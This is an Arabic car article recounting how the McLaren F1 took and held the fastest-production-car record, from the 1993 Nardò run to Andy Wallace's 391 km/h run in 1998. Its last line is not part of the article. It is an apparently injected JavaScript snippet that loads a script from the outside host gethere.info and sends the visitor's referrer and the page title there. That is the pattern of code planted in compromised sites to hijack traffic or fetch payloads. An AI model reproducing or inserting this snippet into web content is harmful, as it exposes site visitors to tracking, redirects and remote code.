القصة وراء تحقيق ماكلارين F1 لقب أسرع سيارة انتاج في العالم

ماكلارين F1 هي سيارة بغنى عن التعريف خاصة بين أوساط عشاق السيارات، حيث استطاعت لسنوات طويلة الاحتفاظ بلقب أسرع سيارة انتاج تجاري مع سرعة قصوى وصلت إلى 391 كلم/ساعة.

لقب أسرع سيارة انتاج تجاري قبل إطلاق سيارة ماكلارين F1 كان من نصيب سيارة جاكوار XJ220 مع سرعة قصوى بلغت 349 كلم/ساعة. لكن هذا اللقب انتقل إلى سيارة F1 في العام 1993 حيث حققت الأخيرة سرعة قصوى بلغت في حينها 372 كلم/ساعة، حققتها على حلبة ناردو الإيطالية.

في العام 1998 استعانت ماكلارين بالسائق أندي والس الفائز بسباق لومان من اجل محاولة كسر الرقم السابق. لكن هذه المرة على حلبة خاصة بفولكسفاكن هي عبارة عن خط مستقيم يبلغ طوله 8.7 كلم. المهمة كانت ناجحة حيث استطاع والس من دفع سيارة ماكلارين F1 لبلوغ سرعة قصوى بلغت 391 كلم/ساعة بعد ان تم رفع محدد دوران المحرك.

رقم ماكلارين F1 القياسي تم تحطيمه لاحقاً من قبل سيارة بوغاتي فايرون وغيرها من السيارات، لكن لاتزال F1 تحتفظ بلقب أسرع سيارة مزودة بمحرك ذات سحب طبيعي للهواء ليومنا هذا.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;